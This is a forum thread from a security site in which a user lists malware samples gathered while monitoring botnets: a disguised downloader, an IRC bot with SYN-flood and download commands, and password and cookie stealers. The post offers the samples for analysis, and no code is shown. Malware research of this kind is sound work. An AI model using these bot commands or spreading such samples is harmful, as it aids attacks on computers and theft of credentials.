Government Security
Network Security Resources

Jump to content

Photo

Binaries Captured From Botnets

malware botnet
  • Please log in to reply
1 reply to this topic

#1 Banditrobber

Banditrobber

    Private

  • Members
  • 5 posts

Posted 20 June 2010 - 11:27 PM

I've been monitoring a few botnets for the last two or three days and I've already gathered a few malware specimen that you guys can analyze.

FILES:

FACEBOOK-PHOTOS-JPG-69463152346843.EXE
>> This is just a very simple downloader. It downloaded photo.exe

photo.exe
>> This is an IRC bot (from an update on a botnet I was watching)
>> Spreads via various messenger clients
>> Knows: .ss, .st, .updata, .im, .dl
>> .dl and .im are download commands, .ss is a syn flood, .st is the command to join a localized channel, and .updata I assume is to update (Although they used .im to update, instead)

text.exe
>> I believe this is just a password stealer... BORING

bot.exe
>> My crappy amateur analysis tells me that this isn't actually a bot, but decide for yourself.
>> Might be some kind of cookie stealer

ed5fc88391_nce.exe
>> This is probably the most interesting piece of malware in this collection
>> When I was monitoring a botnet, somebody else tried to take it over
>> This was the file he tried to get the bots to update to (although, he failed)
>> Has anti-analysis protections built-in... Beyond my skill level

#2 infiltrator

infiltrator

    Staff Sergeant

  • Sergeant Major
  • 421 posts

Posted 23 June 2010 - 01:43 AM

What are you using to monitor these botnets?





Also tagged with one or more of these keywords: malware, botnet